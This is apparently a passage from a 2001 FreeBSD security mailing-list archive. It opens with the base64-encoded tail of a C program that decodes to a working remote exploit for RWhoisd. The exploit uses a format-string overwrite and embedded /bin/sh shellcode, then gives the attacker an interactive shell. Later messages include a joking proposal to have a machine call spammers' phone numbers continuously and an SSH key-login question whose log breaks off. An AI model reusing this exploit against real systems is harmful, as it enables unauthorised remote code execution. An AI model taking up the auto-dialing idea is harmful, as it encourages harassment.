c3lzL3R5cGVzLmg+DQojaW5jbHVkZSA8bmV0aW5ldC9pbi5oPg0KI2luY2x1 ZGUgPG5ldGRiLmg+DQoNCiNkZWZpbmUgVkVSU0lPTiAgICAgICAgICAgICAg ICAgICAgICAgIDIuMA0KI2RlZmluZSBNQVgoeCx5KQkoKHg+eSk/eDp5KQ0K I2RlZmluZSBQT1JUCQkJICAgICAgIDQzMjENCg0KI2RlZmluZSBCVUZGCQkJ ICAgICAgIDI1MQ0KI2RlZmluZSBMRU4JCQkgICAgICAgMTAyNA0KDQoNCnN0 cnVjdCB2ZXJzaW9uIHsNCiAgICAgICAgY2hhciAqbmFtZTsNCglpbnQgcmV0 Ow0KICAgICAgICBpbnQgcmV0MTsNCglpbnQgc3RyOw0KfTsNCg0Kc3RydWN0 IHZlcnNpb24gdmVyc2lvbltdID0geyANCg0KICAgICAgewkiTGludXggeDg2 IChleGVjcHQgU2xhY2sgOC54KSIsLTE4NSwtMjMzLC01IH0gLA0KICAgICAg eyAiTGludXggeDg2IChTbGFja3dhcmUgOC54KSIsNTYsLTQwLDMyNCB9ICwg ICAgICAgICAgICAgIA0KICAgICAgeyAiRnJlZUJTRCAodmVyc2lvbiA8IDQu eCkiLC0xODksLTIzNywtNSB9ICwNCiAgICAgIHsgIk9wZW5CU0QsIEZyZWVC U0QgNC54Iiw1NiwtNDAsMzI0IH0gLCANCiAJCQkwDQp9Ow0KDQovKiAgbW9k aWZpZWQgc2hlbGxjb2RlcyB3aG8gY29udGFpbiBubyBuYXN0eSBjb250cm9s IGNoYXJzICg8PTB4MjApICAqLw0KDQpjaGFyICpldmlsY29kZVtdID0gew0K DQoiXHgzMVx4YzBceDMxXHhkYlx4MzFceGM5XHg0M1x4NDFceDQxXHhiMFx4 M2ZceGNkXHg4MCINCiJceGViXHgyNVx4NWVceDg5XHhmM1x4ODNceGMzXHhl MFx4ODlceDczXHgyOFx4MzFceGMwXHg4OFx4NDNceDI3XHg4OVx4NDMiDQoi XHgyY1x4ODNceGU4XHhmNVx4OGRceDRiXHgyOFx4OGRceDUzXHgyY1x4ODlc eGYzXHhjZFx4ODBceDMxXHhkYlx4ODlceGQ4Ig0KIlx4NDBceGNkXHg4MFx4 ZThceGQ2XHhmZlx4ZmZceGZmL2Jpbi9zaCIgICwNCg0KInNhbWUgYXMgbGlu dXggc2hlbGxjb2RlIiAsIA0KDQoiXHgzMVx4YzBceDJjXHhmZVx4NTBceGZl XHhjOFx4NTBceDUwXHgyY1x4YTdceGNkXHg4MCINCiJceGViXHgyYVx4NWVc eDhkXHg1ZVx4ZTBceDg5XHg3M1x4MmJceDMxXHhkMlx4ODlceDUzXHgyN1x4 ODlceDUzXHgyZiINCiJceDg5XHg1M1x4MzRceDg4XHg1M1x4MzlceDMxXHhj MFx4YjBceDNiXHg4ZFx4NGJceDJiXHg4MFx4NmJceDM4XHgzMCINCiJceDgw XHg2ZVx4ZmFceDMwXHg1MVx4NTFceDU2XHg1MFx4ZWJceDQ4XHhlOFx4ZDFc eGZmXHhmZlx4ZmYvYmluL3NoIg0KInh4eHh4eHh4eHh4eCIgIlx4OWEiICAi eHh4eCIgICJceDM3IiAgIngiICAsIA0KDQogICJzYW1lIGFzIGZyZWVic2Qg c2hlbGxjb2RlIiAsIA0KICANCn0gOw0KDQpjaGFyICpzaGVsbGNvZGU7DQp1 bnNpZ25lZCBsb25nIGludCByZXQsbWVtOw0KaW50IHZlcjsNCg0Kdm9pZCAq ZXJyKGNoYXIgKik7DQp2b2lkICppbnRyKHZvaWQpOw0Kdm9pZCAqdGltZW91 dCh2b2lkKTsNCmludCBvayh2b2lkKTsNCmNoYXIgKmFuc3dlcihjaGFyICos Y2hhciAqLGludCxpbnQpOw0KY2hhciAqbWFrZWFkZCh1bnNpZ25lZCBsb25n IGludCxpbnQsY2hhciAqKTsNCmNoYXIgKm1ha2VidWYoaW50LGNoYXIgKixp bnQpOw0KDQoNCiBtYWluKGludCBhcmdjLCBjaGFyICoqYXJndikgew0KICAg IA0KICAgICAgICBjaGFyIHNlbmRsbltMRU5dLCByZWN2bG5bTEVOXSwqcHRy Ow0KICAgICAgICBpbnQgaSxzb2NrZmQsIG1heGZkLCBic2l6ZTsNCiAgICAg ICAgc3RydWN0IHNvY2thZGRyX2luIGNsaTsNCiAgICAgICAgc3RydWN0IGhv c3RlbnQgKmhwOw0KICAgICAgICBmZF9zZXQgcnNldDsNCg0KDQoJZnByaW50 ZihzdGRlcnIsIlJXaG9pc2QgcmVtb3RlIGV4cGxvaXQgdiUuMWYgYnkgTW9v MFxuIixWRVJTSU9OKTsNCiAgICAgDQogICAgIG1heGZkID0gKHNpemVvZih2 ZXJzaW9uKSAvIHNpemVvZih2ZXJzaW9uWzBdKSkgLSAyOw0KDQogICAgICAg ICBpZiAoYXJnYyA8IDMpIHsNCgkJZnByaW50ZihzdGRlcnIsInVzYWdlOiAl cyA8aG9zdD4gPHZlcnNpb24gbnVtYmVyPg0KCQkJCVxyYXZhaWxhYmxlIHN1 cHBvcnQ6XG4iLGFyZ3ZbMF0pOw0KCQlmb3IgKGk9MDt2ZXJzaW9uW2ldLm5h bWU7aSsrKQ0KCQkJZnByaW50ZihzdGRlcnIsIiglZClcdCVzXG4iLGksdmVy c2lvbltpXS5uYW1lKTsNCgkgICAgICAgIGV4aXQoLTEpOw0KICAgfQ0KICAg IA0KICAgIGZvcihpPTA7YXJndlsyXVtpXTtpKyspIGlmICghaXNkaWdpdChh cmd2WzJdW2ldKSkgDQoJZXJyKCJ2ZXJzaW9uIG5vdCBhdmFpbGFibGUuXG4i KTsNCg0KIHZlciA9IGF0b2koYXJndlsyXSk7DQogICAgICBpZiAoISh2ZXIg PD0gbWF4ZmQpKSAgZXJyKCJ2ZXJzaW9uIG5vdCBhdmFpbGFibGUuXG4iKTsN CgkNCg0Kc2lnbmFsKFNJR0lOVCwodm9pZCAqKWludHIpOw0Kc2lnbmFsKFNJ R0FMUk0sKHZvaWQgKil0aW1lb3V0KTsNCg0KZXZpbGNvZGVbMV0gPSBldmls Y29kZVswXTsgDQpldmlsY29kZVszXSA9IGV2aWxjb2RlWzJdOw0KDQpzaGVs bGNvZGUgPSBldmlsY29kZVt2ZXJdOwkgICANCg0KICAgZnByaW50ZihzdGRl cnIsIlRhcmdldDogJXNcblwNCk9wZXJhdGluZyBTeXN0ZW06ICVzXG4iLGFy Z3ZbMV0sdmVyc2lvblt2ZXJdLm5hbWUpOw0KDQogICAgICAgIGlmKChzb2Nr ZmQgPSBzb2NrZXQoQUZfSU5FVCwgU09DS19TVFJFQU0sIDApKSA8IDApew0K ICAgICAgICAgICAgICAgIHBlcnJvcigiU29ja2V0Iik7DQogICAgICAgICAg ICAgICAgZXhpdCgtMSk7ICB9DQoNCiAgICAgICAgaWYoKGhwID0gZ2V0aG9z dGJ5bmFtZShhcmd2WzFdKSkgPT0gTlVMTCl7DQogICAgICAgICAgICAgICAg cHJpbnRmKCJFcnJvcjogJXNcbiIsIGhzdHJlcnJvcihoX2Vycm5vKSk7DQog ICAgICAgICAgICAgICAgZXhpdCgtMSk7DQogICAgICAgIH0NCg0KICAgICAg ZnB1dHMoIkNvbm5lY3RpbmcgdG8gUldob2lzZC4uLi4iLHN0ZGVycik7DQog IA0KICAgICBiemVybygmY2xpLCBzaXplb2YoY2xpKSk7DQoNCiAgICAgICAg Y2xpLnNpbl9mYW1pbHkgPSBBRl9JTkVUOw0KICAgICAgICBjbGkuc2luX3Bv cnQgPSBodG9ucyhQT1JUKTsNCiAgICAgICAgbWVtY3B5KChjaGFyICopJmNs aS5zaW5fYWRkciwgaHAtPmhfYWRkcl9saXN0WzBdLCBocC0+aF9sZW5ndGgp Ow0KICAgICAgICBpZihjb25uZWN0KHNvY2tmZCwgKHN0cnVjdCBzb2NrYWRk ciAqKSZjbGksIHNpemVvZihjbGkpKSA8IDApew0KICAgICAgICAgICAgICAg IHBlcnJvcigiIik7DQogICAgICAgICAgICAgICAgZXhpdCgtMSk7DQogICAg ICAgIH0NCg0KICBhbnN3ZXIoMCxyZWN2bG4sc29ja2ZkLDApOw0KDQogICAg DQogICAgIGZvciAoaT0wO2k8ODtpKyspIHJlY3ZsbltpXSA9IHRvbG93ZXIo cmVjdmxuW2ldKTsgICAgICAgIA0KDQogICAgICAgaWYoc3RybmNtcChyZWN2 bG4sIiVyd2hvaXMiLDcpKSANCiAgICAgZXJyKCJDb25uZWN0ZWQsXG5CdXQg aXRzIG5vdCBSV2hvaXNkLCBBYm9ydGluZy5cbiIpOyANCiANCiAgICAgICBm cHV0cygiQ29ubmVjdGVkLlxuIixzdGRlcnIpOw0KICAgICAgc2xlZXAoMSk7 DQogICAgICAgZnB1dHMoIkJ1aWxkaW5nIGV2aWwtc3RyaW5nOlxuIixzdGRl cnIpOw0KICAgIA0KICAgICAgIHN0cmNweShzZW5kbG4sIi1zb2EgJXBcbiIp Ow0KDQogICAgICAgIGFuc3dlcihzZW5kbG4scmVjdmxuLHNvY2tmZCwwKTsN Cg0KICAgICBpZiAoc3RyY21wKHJlY3ZsbiwiJWVycm9yIDM0MCBJbnZhbGlk IEF1dGhvcml0eSBBcmVhIikpIA0KICAgICAgIGVycigiQ2FudCByZWFkIG5l Y2Vzc2FyeSBkYXRhLlxuIik7DQoNCmVsc2Ugew0KICAgICAgICBhbnN3ZXIo c2VuZGxuLHJlY3Zsbixzb2NrZmQsMSk7DQogICAgICAgIHB0ciA9IChjaGFy ICopc3Ryc3RyKHJlY3ZsbiwiMHgiKSA7DQoJaWYgKCFwdHIpIGVycigiRGF0 YSBkb2VzbnQgbWF0Y2ggdmVyaXNvbiBnaXZlbi5cbiIpOw0KICAgfQ0KICAg ICAgICBtZW0gPSBzdHJ0b3VsKHB0ciwodm9pZCAqKTAsMTYpOw0KDQogICAg ICAgIHJldCA9ICgobWVtK3ZlcnNpb25bdmVyXS5yZXQpJjB4ZmYpPjB4MjA/ KG1lbSt2ZXJzaW9uW3Zlcl0ucmV0KToNCgkobWVtK3ZlcnNpb25bdmVyXS5y ZXQxKTsNCg0KICAgICAgICBpZiAoIW9rKCkpIGVycigiSW1wb3NzaWJsZSBD b25kaXRpb25zLCBBYm9ydGluZy5cbiIpOw0KDQoNCiAgICAgICAgZnByaW50 ZihzdGRlcnIsIkFzc3VtZWQgRUlQIEFkZHJlc3M6ICUjeFxuIixyZXQpOw0K DQoJYW5zd2VyKG1ha2VidWYoQlVGRixyZWN2bG4sMSkscmVjdmxuLHNvY2tm ZCwxKTsNCg0KICAgICAgICBwdHIgPSAoY2hhciAqKXN0cnN0cihyZWN2bG4s Ijc4Nzg3ODAwIikgIDsgICAgICANCiAgICAgICANCg0KICAgICAgIGlmKCFw dHIpIGVycigwKTsNCg0KICAgICAgIGJzaXplID0gQlVGRiAtIChzdHJsZW4o cHRyKSAvIDQpIDsNCg0KICAgICAgICBtZW0gKz0gIHZlcnNpb25bdmVyXS5z dHIgKyBic2l6ZSArIDggKyAoMyo2KSArICgzKjMpOyAgICAgICAgICAgICAg ICANCg0KICAgICAgIGZwcmludGYoc3RkZXJyLCJBc3N1bWVkIHNoZWxsY29k ZSBhZGRyZXNzOiAlI3hcbiIsbWVtKTsNCiAgICAgICBtYXhmZCA9ICggc3Ry bGVuKHJlY3ZsbikgLSBzdHJsZW4ocHRyKSArIDYgKSAmIDB4ZmYgOw0KDQog ICAgICAgbWFrZWJ1Zihic2l6ZSxzZW5kbG4sMCk7ICANCiAgICAgICBtYWtl YWRkKG1lbSxtYXhmZCxyZWN2bG4pOyANCg0KICAgICAgIHNlbmRsbltzdHJs ZW4oc2VuZGxuKS0xXSA9ICdcMCc7DQogICAgICAgc3RyY2F0KHNlbmRsbixy ZWN2bG4pOw0KDQogICAgIGFuc3dlcihzZW5kbG4scmVjdmxuLHNvY2tmZCwx KTsNCg0KICAgICBwdHIgPSAoY2hhciAqKXN0cnN0cihyZWN2bG4sInh4eCIp IDsNCg0KICAgICAgICBpZiAoIXB0cikgZXJyKDApOyANCg0KICAgICAgKigo Y2hhciAqKXN0cnN0cihwdHIsIjc4Nzg3ODAwIikrOCkgPSAnXDAnOw0KDQog ICAgIGkgPSAoKHN0cmxlbihwdHIpKSAmIDB4ZmYpIC0gIChtZW0gJiAweGZm KSA7DQoNCg0KICAgICAgICBtYWtlYnVmKGJzaXplLHNlbmRsbiwxKTsgbWFr ZWFkZChtZW0sbWF4ZmQraSxyZWN2bG4pOw0KICAgICAgICBzZW5kbG5bc3Ry bGVuKHNlbmRsbiktMV0gPSAnXDAnOw0KICAgICAgICBzdHJjYXQoc2VuZGxu LHJlY3Zsbik7ICANCg0KICAgICAgZnB1dHMoIlNlbmRpbmcgZXZpbC1zdHJp bmcgLCBXYWl0aW5nIGZvciBSZXNwb25zZS4uLi4iLHN0ZGVycik7DQoNCiAg ICAgYW5zd2VyKHNlbmRsbixyZWN2bG4sc29ja2ZkLDEpOw0KDQogICAgICAg YW5zd2VyKCJlY2hvIC1uIFwib2lua1wiO1xuIixyZWN2bG4sc29ja2ZkLDAp Ow0KDQogICAgICAgIGlmIChzdHJjbXAocmVjdmxuLCJvaW5rIikpICB7IA0K CSAgICAgYW5zd2VyKDAscmVjdmxuLHNvY2tmZCwwKTsNCiAgICAgICAgICAg ICBpZiAoc3RyY21wKHJlY3Zsbiwib2luayIpKSBlcnIoMCk7CX0NCg0KICAg ICAgICBmcHV0cygiU3VjY2VzcyFcbiIsc3RkZXJyKTsgICAgICAgIA0KDQog ICAgICAgIHN0cmNweShzZW5kbG4sInVuYW1lIC1hO1xuIik7DQogICAgICAg IHdyaXRlKHNvY2tmZCxzZW5kbG4sc3RybGVuKHNlbmRsbikpOw0KICAgICAg ICBzbGVlcCgxKTsNCiAgICAgICAgZnB1dHMoc2VuZGxuLHN0ZGVycik7DQoN CiAgICAgIHNpZ25hbChTSUdJTlQsU0lHX0lHTik7DQoNCiAgICAgICBiemVy byhzZW5kbG4sIExFTik7DQoNCiAgICAgICAgRkRfWkVSTygmcnNldCk7DQog ICAgICAgIGZvcig7Oyl7DQogICAgICAgICAgICAgICAgRkRfU0VUKGZpbGVu byhzdGRpbiksICZyc2V0KTsNCiAgICAgICAgICAgICAgICBGRF9TRVQoc29j a2ZkLCAmcnNldCk7DQogICAgICAgICAgICAgICAgbWF4ZmQgPSBNQVgoZmls ZW5vKHN0ZGluKSwgc29ja2ZkKSArIDE7DQogICAgICAgICAgICAgICAgc2Vs ZWN0KG1heGZkLCAmcnNldCwgTlVMTCwgTlVMTCwgTlVMTCk7DQogICAgICAg ICAgICAgICAgaWYoRkRfSVNTRVQoZmlsZW5vKHN0ZGluKSwgJnJzZXQpKXsN Cg0KICAgICAgICAgICAgICAgICAgICAgICAgZmdldHMoc2VuZGxuLCBzaXpl b2Yoc2VuZGxuKS0yLCBzdGRpbik7DQogICAgICAgICAgICAgICAgICAgICAg ICB3cml0ZShzb2NrZmQsIHNlbmRsbiwgc3RybGVuKHNlbmRsbikpOw0KIAkJ CWJ6ZXJvKHNlbmRsbiwgTEVOKTsNCiANCiAgICAgICAgICAgICAgIH0NCiAg ICAgICAgICAgICAgICBpZihGRF9JU1NFVChzb2NrZmQsICZyc2V0KSl7DQog ICAgICAgICAgICAgICAgICAgICAgICBiemVybyhyZWN2bG4sIExFTik7DQog ICAgICAgICAgICAgICAgICAgICAgICBpZigNCiAgICAgIChpID0gcmVhZChz b2NrZmQsIHJlY3Zsbiwgc2l6ZW9mKHJlY3ZsbikpKT09IDApew0KICAgICAg ICAgICAgICAgICAgICAgcHJpbnRmKCJoYWNrZXJ6LlxuIik7DQogICAgICAg ICAgICAgICAgICAgICAgICAgICAgICAgIGV4aXQoMCk7DQogICAgICAgICAg ICAgICAgICAgICAgICB9DQogICAgICAgICAgICAgICAgICAgICAgICBpZihp IDwgMCl7DQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHBlcnJv cigicmVhZCIpOw0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBl eGl0KC0xKTsNCiAgICAgICAgICAgICAgICAgICAgICAgIH0NCiAgICAgICAg ICAgICAgICAgICAgICAgIGZwdXRzKHJlY3Zsbiwgc3Rkb3V0KTsNCiAgICAg ICAgICAgICAgICB9DQogICAgICAgIH0NCn0NCg0KDQpjaGFyICptYWtlYnVm KGludCBsZW4sY2hhciAqYnVmLGludCByZWFsKSAgew0KDQoJY2hhciAqYnVm ZiwqcHRyOw0KICAgICAgICB1bnNpZ25lZCBsb25nIGFkZHI7DQoJaW50IGk7 DQoNCmJ6ZXJvKGJ1ZmYgPSBtYWxsb2MobGVuKSxsZW4pOw0KDQogZm9yIChp ID0gMDsgaSA8IGxlbi0xOyBpKz0yKSBzdHJjYXQoYnVmZiwiJXgiKTsNCg0K aWYgKHJlYWwpIGFkZHIgPSByZXQ7DQoNCmVsc2UgYWRkciA9IChtZW0gJiAw eGZmKT4weDIwP21lbTptZW0rMzM7DQoNCnB0ciA9IGJ1ZmY7DQoNCiAgICoo cHRyKyspID0gICAoYWRkciAmIDB4ZmYpIDsNCiAgICoocHRyKyspID0gIChh ZGRyICYgMHhmZjAwKSA+PiA4IDsNCiAgICoocHRyKyspID0gIChhZGRyICYg MHhmZjAwMDApID4+IDE2IDsNCiAgICoocHRyKyspID0gIChhZGRyICYgMHhm ZjAwMDAwMCkgPj4gMjQgOw0KICANCiBtZW1jcHkocHRyLCJBQUFBIiw0KTsN Cg0KcHRyICs9IDQ7DQoNCmkgPSAzOw0KDQp3aGlsZSAoaS0tKSB7DQogICAg DQogICBhZGRyKys7DQoNCiAgICoocHRyKyspID0gICAoYWRkciAmIDB4ZmYp IDsNCiAgICoocHRyKyspID0gIChhZGRyICYgMHhmZjAwKSA+PiA4IDsNCiAg ICoocHRyKyspID0gIChhZGRyICYgMHhmZjAwMDApID4+IDE2IDsNCiAgICoo cHRyKyspID0gIChhZGRyICYgMHhmZjAwMDAwMCkgPj4gMjQgOw0KfQ0KDQoN CnNwcmludGYoYnVmLCItc29hIHh4eCVzXG4iLGJ1ZmYpOw0KDQpmcmVlKGJ1 ZmYpOw0KcmV0dXJuKGJ1Zik7DQogIA0KfQ0KDQpjaGFyICptYWtlYWRkKHVu c2lnbmVkIGxvbmcgaW50IG1lbSxpbnQgdXMsY2hhciAqYWRkKSB7DQoNCiAg ICAgICBjaGFyIGFsbW9nWzQwMF0sc2VuZGxuWzEwMF0sKnB0cjsNCiAgICAg IGludCBtYXhmZCxnb2FsOw0KICAgDQoJICAgZ29hbCA9IChtZW0gJiAweGZm KTsNCg0KICAgICAgICBtYXhmZCA9IChnb2FsIC0gdXMpPDA/KGdvYWwrMjU2 LXVzKTooZ29hbC11cyk7DQoNCiAgICAgICAgc3ByaW50ZihhZGQsIiUlLiVk eCVzIixtYXhmZCs4LCIlaG4iKTsNCg0KICAgICAgICB1cyA9IGdvYWwrIDg7 DQogICAgICAgIGdvYWwgPSAgKG1lbSAmIDB4ZmYwMCkgPj4gOCA7DQoNCiAg ICAgIG1heGZkID0gKGdvYWwgLSB1cyk8MD8oZ29hbCsyNTYtdXMpOihnb2Fs LXVzKTsNCg0KICAgICAgIHNwcmludGYoYWRkLCIlcyUlLiVkeCVzIixhZGQs bWF4ZmQrOCwiJWhuIik7DQoNCiAgICAgICBtZW1zZXQoYWxtb2csJ1x4OTAn LDMwMCk7DQogICAgICAgYWxtb2dbMzAwXSA9ICdcMCc7DQogICAgICAgIA0K DQogICAgICAgIHVzID0gZ29hbCA7DQogICAgICAgIGdvYWwgPSAgKG1lbSAm IDB4ZmYwMDAwKSA+PiAxNiA7DQoNCiAgICAgICBtYXhmZCA9IChnb2FsIC0g dXMpPDA/KGdvYWwrMjU2LXVzKTooZ29hbC11cyk7DQoNCiAgICAgICBzcHJp bnRmKHNlbmRsbiwiJSVzJSUuJWRzIixtYXhmZCk7DQoNCmlmICh2ZXIgPiAx KSB7DQogICAgICAgcHRyID0gYWxtb2cgKyAobWF4ZmQgLSBzdHJsZW4oc2hl bGxjb2RlKSk7DQoNCiAgICAgIG1lbWNweShwdHIsc2hlbGxjb2RlLHN0cmxl bihzaGVsbGNvZGUpKTsNCg0KCX0NCg0KICAgICAgc3ByaW50ZihhZGQsc2Vu ZGxuLGFkZCxhbG1vZyk7DQoNCiAgICAgIHN0cmNhdChhZGQsIiVobiIpOw0K DQogICAgICB1cyA9IGdvYWwgOw0KICAgICAgZ29hbCA9ICAobWVtICYgMHhm ZjAwMDAwMCkgPj4gMjQgOw0KDQogICAgbWF4ZmQgPSAoZ29hbCAtIHVzKTww Pyhnb2FsKzI1Ni11cyk6KGdvYWwtdXMpOw0KDQogICAgICAgc3ByaW50Zihz ZW5kbG4sIiUlcyUlLiVkcyIsbWF4ZmQpOw0KDQppZiAodmVyIDw9IDEpIHsg ICANCiAgICAgIHB0ciA9IGFsbW9nICsgKG1heGZkIC0gc3RybGVuKHNoZWxs Y29kZSkpOw0KDQogICAgICBtZW1jcHkocHRyLHNoZWxsY29kZSxzdHJsZW4o c2hlbGxjb2RlKSk7DQoJfQ0KICAgICBzcHJpbnRmKGFkZCxzZW5kbG4sYWRk LGFsbW9nKTsNCiAgICAgICAgc3RyY2F0KGFkZCwiJWhuXG4iKTsNCg0KIHJl dHVybihhZGQpOw0KDQp9DQoNCg0KY2hhciAqYW5zd2VyKGNoYXIgKnNlbmRs bixjaGFyICpyZWN2bG4saW50IHNvY2tmZCxpbnQgZXh0cmEpIHsNCg0KICAg ICAgIGFsYXJtKDE1KTsgIA0KICAgICAgaWYgKHNlbmRsbikgd3JpdGUoc29j a2ZkLHNlbmRsbixzdHJsZW4oc2VuZGxuKSk7DQogICAgICBpZiAoZXh0cmEp IHJlYWQoc29ja2ZkLHJlY3ZsbixMRU4pIDsNCiAgICAgICAgYnplcm8ocmVj dmxuLCBMRU4pOw0KICAgICAgICByZWFkKHNvY2tmZCxyZWN2bG4sTEVOKSA7 DQoNCiAgICAgIGFsYXJtKDApOw0KICAgICAgcmV0dXJuKHJlY3Zsbik7DQoN Cn0NCg0KDQp2b2lkICppbnRyKHZvaWQpIHsNCg0KZmZsdXNoKHN0ZG91dCk7 DQoNCmZwdXRzKCJcbkludGVycnVwdGlvbiBmcm9tIGtleWJvYXJkLi4uYWJv cnRpbmcuXG4iLHN0ZGVycik7DQoNCmV4aXQoLTEpOw0KDQp9DQoNCnZvaWQg KnRpbWVvdXQodm9pZCkgew0KDQpmcHV0cygiVGltZW91dCFcbiIsc3RkZXJy KTsNCg0KZXhpdCgtMSk7DQp9DQoNCg0KDQppbnQgb2sodm9pZCkgew0KDQpp ZiAoICAgICAoKHJldCAmIDB4ZmYpID4gMHgyMCkNCiAgICAgJiYJKCgocmV0 ICYgMHhmZjAwKSA+PiA4KSA+IDB4MjApIA0KICAgICAmJiAoKChyZXQgJiAw eGZmMDAwMCkgPj4gMTYpID4gMHgyMCkNCiAgICAgJiYgKCgocmV0ICYgMHhm ZjAwMDAwMCkgPj4gMjQpICA+IDB4MjApICkgcmV0dXJuKDEpOw0KDQpyZXR1 cm4oMCk7DQoNCn0NCg0Kdm9pZCAqZXJyKGNoYXIgKm1zZykgew0KDQppZiAo bXNnKSBmcHV0cyhtc2csc3RkZXJyKTsNCmVsc2UgZnB1dHMoIkZhaWxlZC5c biIsc3RkZXJyKTsNCg0KZXhpdCgtMSk7DQoNCn0NCg0K --8323328-1200701191-1004030751=:5027-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Oct 25 8: 2:26 2001 Delivered-To: freebsd-security@freebsd.org Received: from mail.all.org (bdsl.66.12.117.154.gte.net [66.12.117.154]) by hub.freebsd.org (Postfix) with ESMTP id 5E5A237B406 for ; Thu, 25 Oct 2001 08:02:21 -0700 (PDT) Message-ID: <3BD59381.1000500@all.org> Date: Tue, 23 Oct 2001 11:57:53 -0400 From: "Steve Littleford" MIME-Version: 1.0 To: security@freebsd.org Subject: RE: Toner Cartridges Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Everyone, I know spam is a fact of life, but these guys have a reputation for being jerks (or Toner weasels, if you prefer). http://www.ecst.csuchico.edu/~atman/spam/ > **** VORTEX SUPPLIES **** ... > ORDER BY PHONE:1-888-288-9043 > ORDER BY FAX: 1-888-977-1577 > E-MAIL REMOVAL LINE: 1-888-494-8597 Since this is a security list, could someone tell me what security problems I might run into if my FreeBSD machine were configured to call these 1-888 numbers continually? Aside from the hardware about two or three modems? Is it possible to assign this task to a non-root thread? -Steve (gee, what do I do with these spare modems and Digi-Board?) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Oct 25 9: 4:45 2001 Delivered-To: freebsd-security@freebsd.org Received: from mohegan.mohawk.net (mohegan.mohawk.net [63.66.68.21]) by hub.freebsd.org (Postfix) with ESMTP id 2020F37B401 for ; Thu, 25 Oct 2001 09:04:40 -0700 (PDT) Received: from mohegan.mohawk.net (mohegan.mohawk.net [63.66.68.21]) by mohegan.mohawk.net (8.11.4/8.11.3) with ESMTP id f9PG4Qb39002; Thu, 25 Oct 2001 12:04:26 -0400 (EDT) Date: Thu, 25 Oct 2001 12:04:26 -0400 (EDT) From: Ralph Huntington To: Steve Littleford Cc: Subject: RE: Toner Cartridges In-Reply-To: <3BD59381.1000500@all.org> Message-ID: <20011025120404.E36395-100000@mohegan.mohawk.net> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org This is NOT a security issue On Tue, 23 Oct 2001, Steve Littleford wrote: > Everyone, > > I know spam is a fact of life, but these guys have a reputation for > being jerks (or Toner weasels, if you prefer). > http://www.ecst.csuchico.edu/~atman/spam/ > > > > **** VORTEX SUPPLIES **** > > > ... > > > ORDER BY PHONE:1-888-288-9043 > > > ORDER BY FAX: 1-888-977-1577 > > E-MAIL REMOVAL LINE: 1-888-494-8597 > > > Since this is a security list, could someone tell me what security > problems I might run into if my FreeBSD machine were configured to call > these 1-888 numbers continually? Aside from the hardware about two or > three modems? Is it possible to assign this task to a non-root thread? > > > -Steve > > (gee, what do I do with these spare modems and Digi-Board?) > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Oct 26 0:17:13 2001 Delivered-To: freebsd-security@freebsd.org Received: from relay.pair.com (relay1.pair.com [209.68.1.20]) by hub.freebsd.org (Postfix) with SMTP id 6F3E637B408 for ; Fri, 26 Oct 2001 00:17:04 -0700 (PDT) Received: (qmail 20087 invoked from network); 26 Oct 2001 07:17:02 -0000 Received: from pec-124-149.tnt8.m2.uunet.de (HELO laptop) (149.225.124.149) by relay1.pair.com with SMTP; 26 Oct 2001 07:17:02 -0000 X-pair-Authenticated: 149.225.124.149 Message-ID: <006801c15dee$471d80c0$0901a8c0@system> From: "Tom Beer" To: Subject: Putty & SSH Date: Fri, 26 Oct 2001 09:16:24 +0200 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.00.2615.200 X-MIMEOLE: Produced By Microsoft MimeOLE V5.00.2615.200 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Hi, I try to connect from my M$ to a Freebsd Box using Putty via SSH. The keys were produced with the normal procedure under BSD. However, it is not possible to connect without entering a user name and password. This fails, cause I only want to connect via the ssh key and configured sshd in that way. The log on BSD reads as follows: Oct 25 14:18:14 strawberry sshd[158]: debug1: Forked child 15696. Oct 25 14:18:14 strawberry sshd[15696]: Connection from laptop.system port 1426 Oct 25 14:18:14 strawberry sshd[15696]: Connection from 192.168.1.9 port 1426 Oct 25 14:18:14 strawberry sshd[15696]: debug1: Client protocol version 2.0; client software version PuTTY Oct 25 14:18:14 strawberry sshd[15696]: debug1: no match: PuTTY Oct 25 14:18:14 strawberry sshd[15696]: Enabling compatibility mode for protocol 2.0 Oct 25 14:18:14 strawberry sshd[15696]: debug1: Local version string SSH-2.0-OpenSSH_2.3.0 green@FreeBSD.org 20010321 Oct 25 14:18:14 strawberry sshd[15696]: debug1: send KEXINIT Oct 25 14:18:14 strawberry sshd[15696]: debug1: done Oct 25 14:18:14 strawberry sshd[15696]: debug1: wait KEXINIT Oct 25 14:18:14 strawberry sshd[15696]: debug1: got kexinit: diffie-hellman-group1-sha1 Oct 25 14:18:14 strawberry sshd[15696]: debug1: got kexinit: ssh-dss Oct 25 14:18:14 strawberry sshd[15696]: debug1: got kexinit: 3des-cbc,blowfish-cbc,3des-cbc Oct 25 14:18:14 strawberry sshd[15696]: debug1: got kexinit: 3des-cbc,blowfish-cbc,3des-cbc Oct 25 14:18:14 strawberry sshd[15696]: debug1: got kexinit: hmac-sha1,hmac-md5,none Oct 25 14:18:14 strawberry sshd[15696]: debug1: got kexinit: hmac-sha1,hmac-md5,none Oct 25 14:18:14 strawberry sshd[15696]: debug1: got kexinit: none,zlib,none Oct 25 14:18:14 strawberry sshd[15696]: debug1: got kexinit: none,zlib,none Oct 25 14:18:14 strawberry 